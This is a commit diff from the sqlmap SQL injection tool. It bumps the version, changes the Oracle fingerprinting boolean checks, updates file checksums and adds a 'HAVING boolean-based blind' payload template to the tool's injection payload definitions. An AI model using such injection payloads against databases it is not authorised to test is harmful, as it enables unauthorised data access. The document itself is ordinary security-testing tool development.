Adding new payload (HAVING boolean-based blind)

2025-02-03 13:14:13 +03:00 · 2018-06-05 00:59:47 +02:00 · 2018-06-05 00:59:47 +02:00 · 25369ca591
commit 25369ca591
parent a399b65033
4 changed files with 26 additions and 9 deletions
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS

 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.2.6.4"
+VERSION = "1.2.6.5"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@ -68,23 +68,23 @@ class Fingerprint(GenericFingerprint):
        infoMsg = "testing %s" % DBMS.ORACLE
        logger.info(infoMsg)

-        # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting
-        # directly to the Oracle database
+        # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
+        # not work connecting directly to the Oracle database
        if conf.direct:
            result = True
        else:
-            result = inject.checkBooleanExpression("ROWNUM=ROWNUM")
+            result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")

        if result:
            infoMsg = "confirming %s" % DBMS.ORACLE
            logger.info(infoMsg)

-            # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
+            # NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does
            # not work connecting directly to the Oracle database
            if conf.direct:
                result = True
            else:
-                result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+                result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")

            if not result:
                warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d  lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192  lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5  lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b  lib/core/session.py
-9d0f7b5da86733268cf0ee3bcce3fd0e  lib/core/settings.py
+ea76ddec1c3e65b63c217aaaf6e15e3c  lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6  lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19  lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d  lib/core/target.py
@ -177,7 +177,7 @@ fcbf7ff279c527b4aca0dac94c28d20c  plugins/dbms/mysql/fingerprint.py
 f772070dba85976a7894dac5046b93ea  plugins/dbms/oracle/connector.py
 e1ffee36fd18f33f34bb4bac4ae43f14  plugins/dbms/oracle/enumeration.py
 c326b0d8bed92be67888b0242f565ac8  plugins/dbms/oracle/filesystem.py
-e16cbf8abda91a906ca7bafb81d8866e  plugins/dbms/oracle/fingerprint.py
+538395c0e5ccb1b6befc17f129f45f29  plugins/dbms/oracle/fingerprint.py
 9cbce3d3747c67f18e65f9c1eb910b0e  plugins/dbms/oracle/__init__.py
 5c2f1611c3ceface38a7e95650391ae6  plugins/dbms/oracle/syntax.py
 bcdbd9c04d7d5a911e0e31abe1a24f0f  plugins/dbms/oracle/takeover.py
@ -467,7 +467,7 @@ d989813ee377252bca2103cea524c06b  xml/banner/sharepoint.xml
 fb93505ef0ab3b4a20900f3e5625260d  xml/boundaries.xml
 0d0d4bd0e06c99dd8eb4f92acc25caf3  xml/errors.xml
 a279656ea3fcb85c727249b02f828383  xml/livetests.xml
-14a2abeb88b00ab489359d0dd7a3017f  xml/payloads/boolean_blind.xml
+3318571fac8df058f19ea85780606643  xml/payloads/boolean_blind.xml
 b5b8b0aebce810e6cdda1b7106c96427  xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5  xml/payloads/inline_query.xml
 3194e2688a7576e1f877d5b137f7c260  xml/payloads/stacked_queries.xml
--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@ -1361,6 +1361,23 @@ Tag: <test>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>
+
+    <!-- Works in MySQL, Oracle, etc. -->
+    <test>
+        <title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2</clause>
+        <where>1</where>
+        <vector>HAVING [INFERENCE]</vector>
+        <request>
+            <payload>HAVING [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
    <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->

    <!-- Boolean-based blind tests - Stacked queries -->